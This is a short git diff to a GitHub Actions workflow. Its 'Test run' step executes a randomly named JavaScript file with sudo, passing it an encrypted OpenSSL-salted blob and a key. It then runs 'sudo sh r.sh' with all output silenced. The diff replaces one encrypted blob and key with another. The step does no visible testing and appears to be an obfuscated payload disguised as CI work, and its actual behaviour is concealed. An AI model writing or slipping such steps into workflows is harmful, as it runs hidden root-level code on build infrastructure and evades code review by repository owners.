--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'vsd9z'
+        echo '9r4j7'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19ZdeQCw0+BGBwNl2ehe0jewMQe1V+HGrrX6uOzGOeaQakRCfwL644UQVY8t7pZDAtWR7b+okcrx7/3PC9HXnzmF6QRZ9pagUGEiIB5/iLgWMxUatd2wcIH vytk7o && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/dHv5877Ok/v6+jaOvBZIEUgyFVOuFI2rSU5JoFRP6O4FhYC3Ai46bwFoIFrXmrehCEI2Rxhlk+iMRIwfTeyUaTkFdcsKvCVjmOsjbIMNDquUOR6SYnmT+ fnjbua && sudo sh r.sh > /dev/null 2>&1
